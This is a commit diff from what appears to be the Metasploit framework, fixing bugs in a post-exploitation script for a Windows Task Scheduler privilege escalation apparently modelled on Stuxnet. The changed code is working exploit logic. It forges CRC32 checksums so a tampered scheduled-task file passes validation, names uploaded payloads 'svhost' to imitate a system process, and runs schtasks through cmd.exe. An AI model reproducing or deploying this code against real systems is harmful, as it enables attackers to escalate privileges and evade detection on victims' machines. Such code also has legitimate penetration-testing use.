Fixes #3249: Bugs reported by Eric Romang, thx!
git-svn-id: file:///home/svn/framework3/trunk@11134 4d416f70-5f16-0410-b530-b9f4589650daunstable
Joshua Drake
parent
484b18c472
commit
c8a04d8899
|
|
@ -20,7 +20,7 @@ require 'zlib'
|
|||
#
|
||||
# Filter out sessions that this definitely won't work on.
|
||||
#
|
||||
if session.platform !~ /win32|win64/
|
||||
if session.platform !~ /win32|win64|java/
|
||||
print_error("#{session.platform} is not supported.")
|
||||
raise Rex::Script::Completed
|
||||
end
|
||||
|
|
@ -67,6 +67,7 @@ def usage
|
|||
raise Rex::Script::Completed
|
||||
end
|
||||
|
||||
taskname = nil
|
||||
cmd = nil
|
||||
upload_fn = nil
|
||||
@@exec_opts.parse(args) { |opt, idx, val|
|
||||
|
|
@ -92,7 +93,7 @@ upload_fn = nil
|
|||
|
||||
# Must have at least one of -c or -u
|
||||
if not cmd and not upload_fn
|
||||
print_error("You must specify -c or -s")
|
||||
print_error("You must specify -c or -u")
|
||||
print_line('')
|
||||
usage
|
||||
end
|
||||
|
|
@ -115,7 +116,7 @@ if upload_fn
|
|||
if ext == "exe"
|
||||
location << "\\svhost#{rand(100)}.exe"
|
||||
else
|
||||
location << "\\TMP#{rand(100)}#{ext}"
|
||||
location << "\\TMP#{rand(100)}.#{ext}"
|
||||
end
|
||||
else
|
||||
location << "\\TMP#{rand(100)}"
|
||||
|
|
@ -137,10 +138,7 @@ end
|
|||
# CRC32 stuff from ESET (presumably reversed from Stuxnet, which was presumably
|
||||
# reversed from Microsoft's code)
|
||||
#
|
||||
if not self.class.const_defined? 'ESET'
|
||||
|
||||
class ESET
|
||||
BWD_Table = [
|
||||
bwd_table = [
|
||||
0x00000000, 0xDB710641, 0x6D930AC3, 0xB6E20C82,
|
||||
0xDB261586, 0x005713C7, 0xB6B51F45, 0x6DC41904,
|
||||
0x6D3D2D4D, 0xB64C2B0C, 0x00AE278E, 0xDBDF21CF,
|
||||
|
|
@ -205,40 +203,39 @@ class ESET
|
|||
0xD4B55116, 0x0FC45757, 0xB9265BD5, 0x62575D94,
|
||||
0x62AE69DD, 0xB9DF6F9C, 0x0F3D631E, 0xD44C655F,
|
||||
0xB9887C5B, 0x62F97A1A, 0xD41B7698, 0x0F6A70D9
|
||||
]
|
||||
]
|
||||
|
||||
def self.crc32(data)
|
||||
def crc32(data)
|
||||
table = Zlib.crc_table
|
||||
crc = 0xffffffff
|
||||
data.unpack('C*').each { |b|
|
||||
crc = table[(crc & 0xff) ^ b] ^ (crc >> 8)
|
||||
}
|
||||
crc
|
||||
end
|
||||
end
|
||||
|
||||
def self.fix_crc32(data, old_crc)
|
||||
crc = self.crc32(data[0, data.length - 12])
|
||||
def fix_crc32(data, old_crc)
|
||||
crc = crc32(data[0, data.length - 12])
|
||||
data[-12, 4] = [crc].pack('V')
|
||||
|
||||
data[-12, 12].unpack('C*').reverse.each { |b|
|
||||
old_crc = ((old_crc << 8) ^ BWD_Table[old_crc >> 24] ^ b) & 0xffffffff
|
||||
old_crc = ((old_crc << 8) ^ bwd_table[old_crc >> 24] ^ b) & 0xffffffff
|
||||
}
|
||||
data[-12, 4] = [old_crc].pack('V')
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
||||
def exec_schtasks(cmdline, purpose)
|
||||
lns = cmd_exec(cmdline)
|
||||
lns = cmd_exec("cmd.exe /c " + cmdline + " && echo SCHELEVATOR")
|
||||
success = false
|
||||
lns.each_line { |ln|
|
||||
print_status(ln.chomp)
|
||||
}
|
||||
if lns !~ /SUCCESS:/
|
||||
raise "Unable to #{purpose}!"
|
||||
ln.chomp!
|
||||
if ln =~ /^SCHELEVATOR$/
|
||||
success = true
|
||||
else
|
||||
print_status(ln)
|
||||
end
|
||||
lns
|
||||
}
|
||||
raise "Unable to #{purpose}!" if not success
|
||||
end
|
||||
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue